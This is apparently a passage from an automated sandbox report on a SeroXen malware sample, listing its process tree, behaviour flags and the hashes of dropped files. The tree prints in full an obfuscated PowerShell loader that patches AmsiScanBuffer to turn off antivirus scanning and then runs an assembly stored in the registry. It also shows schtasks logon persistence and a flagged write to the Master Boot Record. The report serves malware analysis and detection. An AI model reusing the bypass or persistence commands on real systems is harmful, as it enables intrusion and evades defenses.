vices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gxpUVcPkgLFCBYdMf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbtnTPXoxPYRHjNnc,$MQffEiWUEZmFwEIgNVPpRJ).Invoke($gxpUVcPkgLFCBYdMf,[uint32]8,0x20,[ref]$EXJJCSpYOv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+'age'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WgClHolYQirx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wlXJnoTNYVBtgU,[Parameter(Position=1)][Type]$npSrcuHCdB)$nLrHJWSMiVP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'ct'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'mo'+'r'+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+'le'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'T'+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$nLrHJWSMiVP.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+'N'+'a'+''+[Char](109)+''+'e'+''+','+''+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$wlXJnoTNYVBtgU).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$nLrHJWSMiVP.DefineMethod('In'+[Char](118)+''+'o'+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+'l'+'i'+'c'+','+''+'H'+''+'i'+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+'Si'+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot'+','+''+'V'+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$npSrcuHCdB,$wlXJnoTNYVBtgU).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');Write-Output $nLrHJWSMiVP.CreateType();}$mXVdLREoyZtbO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+[Char](102)+'t'+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+'iv'+[Char](101)+''+'M'+'e'+[Char](116)+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$XUmJqNPSBpACnj=$mXVdLREoyZtbO.GetMethod(''+'G'+'et'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'l'+'i'+'c'+[Char](44)+'S'+'t'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WYkdIQgaJRzrZKfjvmb=WgClHolYQirx @([String])([IntPtr]);$gPqWBpLsllJoHhhVSnOgur=WgClHolYQirx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ybSnmbaprXS=$mXVdLREoyZtbO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'M'+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$fwoAHotVEDVJVD=$XUmJqNPSBpACnj.Invoke($Null,@([Object]$ybSnmbaprXS,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$EhegCRJyuyxhFuOzB=$XUmJqNPSBpACnj.Invoke($Null,@([Object]$ybSnmbaprXS,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+'ct')));$QqcQxit=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fwoAHotVEDVJVD,$WYkdIQgaJRzrZKfjvmb).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$hQqhhBfMMubMaSawb=$XUmJqNPSBpACnj.Invoke($Null,@([Object]$QqcQxit,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$kiEZdEIeqw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EhegCRJyuyxhFuOzB,$gPqWBpLsllJoHhhVSnOgur).Invoke($hQqhhBfMMubMaSawb,[uint32]8,4,[ref]$kiEZdEIeqw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hQqhhBfMMubMaSawb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EhegCRJyuyxhFuOzB,$gPqWBpLsllJoHhhVSnOgur).Invoke($hQqhhBfMMubMaSawb,[uint32]8,0x20,[ref]$kiEZdEIeqw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'RE').GetValue('$'+[Char](55)+'7'+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1388
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1672
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2592
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1028
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2600
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:1684 -
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\t0AgLtCPSbAg.exe"C:\Users\Admin\AppData\Local\Temp\t0AgLtCPSbAg.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:552 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3484
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3828
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3892
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3972
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2180
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1548
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2888
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3680
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4160
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1504
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4900
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
225KB
MD5af2379cc4d607a45ac44d62135fb7015
SHA139b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA25626b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA51269899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99
-
Filesize
409KB
MD54c2bb0618a6eda615c8001d5a7ccd6c0
SHA1c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA5126abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b